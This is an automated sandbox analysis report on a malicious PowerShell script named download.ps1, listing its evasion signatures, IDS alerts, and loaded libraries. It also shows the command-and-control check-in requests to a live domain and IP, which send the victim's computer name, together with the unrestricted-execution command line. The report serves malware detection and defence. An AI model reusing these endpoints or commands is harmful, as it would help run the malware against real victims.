Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1584946
MD5: f44b774aac3ec4688531510b0c1eaf52
SHA1: 48e0b9a7650ff5b4294d6a5e6d4bdd6a113ffd1b
SHA256: f0802f6ec8278c7b05dcfcc763107f37f4e78c24d87d881f9fa36dfe6918a36e
Tags: KongTuke, ps1, user-monitorsg

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 2800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2800, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2800, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T20:02:05.019539+0100 | 2057741 | 1 | A Network Trojan was detected | 192.168.2.5 | 53907 | 45.61.136.138 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T20:02:05.019539+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53907 | 45.61.136.138 | 80 | TCP
2025-01-06T20:02:06.031749+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.5 | 53908 | 142.250.186.36 | 80 | TCP

Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2151284254.000002931C8D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbs.dll source: powershell.exe, 00000000.00000002.2191030398.0000029336C9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2192157948.0000029336EEC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2191030398.0000029336CD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbJ source: powershell.exe, 00000000.00000002.2189854699.0000029336B07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utomation.pdbdbO source: powershell.exe, 00000000.00000002.2189854699.0000029336B07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbv source: powershell.exe, 00000000.00000002.2191030398.0000029336CD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb- source: powershell.exe, 00000000.00000002.2191030398.0000029336CD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbalidateNotNuR source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice6 source: powershell.exe, 00000000.00000002.2191030398.0000029336C9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2151284254.000002931C957000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2189854699.0000029336B07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic; Suricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.5:53907 -> 45.61.136.138:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 45.61.136.138
Source: Joe Sandbox View; ASN Name: AS40676US
Source: Network traffic; Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:53908 -> 142.250.186.36:80
Source: Network traffic; Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:53907 -> 45.61.136.138:80
Source: global traffic; HTTP traffic detected: GET /f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: bfhdkgmmhdbikgj.top Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global traffic; DNS traffic detected: DNS query: bfhdkgmmhdbikgj.top
Source: global traffic; DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FB5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$q0683ukmncpy7gl/$6feonrgjq9a5ulh.php?id=$env:computername&key=$buwjfgxalt&s=527
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2151716083.000002931FB5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FDFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bfhdkgmmhdbikgj.top
Source: powershell.exe, 00000000.00000002.2151716083.000002931FB5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bfhdkgmmhdbikgj.top/f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527
Source: powershell.exe, 00000000.00000002.2191030398.0000029336C0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
Source: powershell.exe, 00000000.00000002.2189658899.0000029336A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft$T5
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.0000029320D06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.0000029320B5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.0000029320CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2151716083.000002931E641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FDFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2191030398.0000029336C0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwft.com/p/Mic
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2151716083.000002931E641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://www.google.com/maps/search/electronics%2Brecycling%2Bnear%2Bme%
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FF848E78B82
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FF848E77DD6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FF848E6CA31
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FF848E70BFB
Source: classification engine | Classification label: mal64.evad.winPS1@2/7@4/2
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1216:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brcgjtus.pzf.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
